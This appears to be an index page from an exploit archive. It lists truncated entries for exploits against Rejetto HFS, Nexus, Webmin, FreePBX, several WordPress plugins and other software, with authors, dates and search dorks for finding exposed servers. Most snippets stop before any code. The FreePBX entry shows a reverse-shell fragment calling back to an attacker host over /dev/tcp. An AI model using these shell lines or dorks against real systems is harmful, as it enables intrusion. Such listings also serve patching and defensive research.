Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)

Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution RCE Fofa Dork: "HttpFileServer" && server=="HFS 2.3m" Date: 2024-09-22 Exploit Author: VeryLazyTech GitHub: https://github.com/verylazytech/CVE-2024-23692 Vendor Homepage: http://rejetto.com/hfs/ Software Link:...

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

Exploit Title: Sonatype Nexus Repository 3.53.0-01 - Path Traversal Google Dork: header="Server: Nexus/3.53.0-01 OSS" Date: 2024-09-22 Exploit Author: VeryLazyTech GitHub: https://github.com/verylazytech/CVE-2024-4956 Vendor Homepage: https://www.sonatype.com/nexus-repository Software Link:...

Dolphin Pro 7.4.2 SQL Injection

Dolphin Pro version 7.4.2 suffers from a remote SQL injection vulnerability. Exploit Title: SQL Injection in Admin Functionality - dolphin.prov7.4.2 Date: 03/2025 Exploit Author: Andrey Stoykov Version: 7.4.2 Date: 03/2025 Tested on: Debian 12 Blog:...

Poko Arcade HTML 5 Game Portal PHP Script 1.0 SQL Injection

Poko Arcade HTML 5 Game Portal PHP Script version 1.0 suffers from a remote SQL injection vulnerability. Exploit Title: Poko Arcade HTML 5 Game Portal PHP Script v1.0 - SQL Injection Date: 05-03-2025 Exploit Author: Buğra Enis Dönmez Vendor:...

Monstra CMS 3.0.4 Remote Command Execution

Monstra CMS version 3.0.4 proof of concept remote command execution exploit. Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution Date: 05.03.2024 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://monstra.org/ Software Link: https://monstra.org/monstra-3.0.4.zip Version: 3.0.4 Tested...

Webmin 2.202 Remote Code Execution

Webmin version 2.202 suffers from a remote code execution vulnerability. Exploit Title: Webmin RCE Leading to Privilege Escalation Google Dork: N/A Date: 05-03-2025 Exploit Author: Buğra Enis Dönmez Vendor Homepage: https://webmin.com/ Software Link: https://webmin.com/ Version: 2.202 Tested on:...

Crest Engine CMS 1.0 Cross Site Scripting

Crest Engine CMS version 1.0 suffers from a cross site scripting vulnerability. Exploit Title: Crest Engine CMS - Reflected Cross-Site Scripting XSS Exploit Author: wa-3, Telegram: @wa03 Vendor Homepage: http://e-gate.me/ Version: 1.0 Tested on: http://demo.e-gate.me/ Vulnerable path:/crest/engin...

MySchool 1.0 SQL Injection / Code Injection / XSS / CSRF Vulnerabilities

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title MySchool System - Multiple Vulnerabilities .:. Google Dorks .:. inurl:web/teacherapp .:. Date:Jan 20, 2025 .:. Exploit Author: bRpsd .:. Contact: cyatlive.no .:. Vendor - https://myschool-system.com/ .:. Vendor...

OpenPanel 0.3.4 Directory Traversal Vulnerability

Exploit Title: OpenPanel 0.3.4 - Directory Traversal in Copy Function of File Manager Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee Vendor Homepage: https://openpanel.com/ Software Link: https://openpanel.com/ Version: 0.3.4 Tested on: macOS CVE : CVE-2024-53582 POST...

Exploit for CVE-2024-57785

CVE-2024-57785 Exploit Title: Authenticated File Incl...

reNgine 2.2.0 Command Injection

Exploit Title: reNgine 2.2.0 - Command Injection Authenticated Date: 2024-09-29 Exploit Author: Caner Tercan Vendor Homepage: https://rengine.wiki/ Software Link: https://github.com/yogeshojha/rengine Version: v2.2.0 Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3...

Helpdeskz 2.0.2 Cross Site Scripting

Exploit Title: Stored XSS Vulnerability via File Name Google Dork: N/A Date: 08 Aug 2024 Exploit Author: Md. Sadikul Islam Vendor Homepage: https://www.helpdeskz.com/ Software Link: https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip Version: v2.0.2 Tested on: Kali Linux / Firefox...

WordPress PZ Frontend Manager 1.0.5 Cross Site Request Forgery

Exploit Title: pz-frontend-manager = 1.0.5 - CSRF change user profile picture Date: 2024-07-01 Exploit Author: Vuln Seeker Cybersecurity Team Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/ Version: = 1.0.5 Tested on: Firefox Contact me: [email protected] The plugin does no...

ESET NOD32 Antivirus 17.2.7.0 Unquoted Service Path

Exploit Title: ESET NOD32 Antivirus 17.2.7.0 - Unquoted Service Path Exploit Author: Milad Karimi Ex3ptionaL Exploit Date: 2024-07-09 Contact: [email protected] Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL Vendor : https://www.eset.com Version : 17.2.7.0 Tested on OS: Microsoft Windows...

WordPress Poll Maker 5.3.2 SQL Injection

Exploit Title: WordPress Poll Maker Plugin SQL Injection Date: 2024-07-11 Exploit Author: tmrswrr Category : Webapps Vendor: https://ays-pro.com/wordpress/poll-maker Version 5.3.2 1. Access the Admin Panel: - Navigate to the admin panel of your WordPress site. - Go to Poll Maker Results...

Simple Laboratory Management System 1.0 SQL Injection

Exploit Title: Simple Laboratory Management System - Manual Blind Time Based SQL Injection Exploit Description: A SQL Injection vulnerability in Computer Laboratory Management System v1.0 allows attackers to execute arbitrary SQL commands on the database server which causes the services to delay ...

User Registration And Management System 3.2 SQL Injection

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title User Registration & Management System - SQLi .:. Google Dorks .:. inurl:loginsystem/index.php .:. Date: June 18, 2024 .:. Exploit Author: bRpsd .:. Contact: cyatlive.no .:. Vendor - https://phpgurukul.com/ .:...

appRain CMF 4.0.5 - Remote Code Execution (Authenticated) Exploit

Exploit Title: appRain CMF 4.0.5 - Remote Code Execution RCE Authenticated Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.apprain.org Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip Version: latest Tested on: MacOS import requests import sys import...

FreePBX 16 Remote Code Execution

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...

WordPress Playlist For Youtube 1.32 Cross Site Scripting

Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting XSS Date: 22 March 2024 Exploit Author: Erdemstar Vendor: https://wordpress.com/ Version: 1.32 Proof Of Concept: 1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or...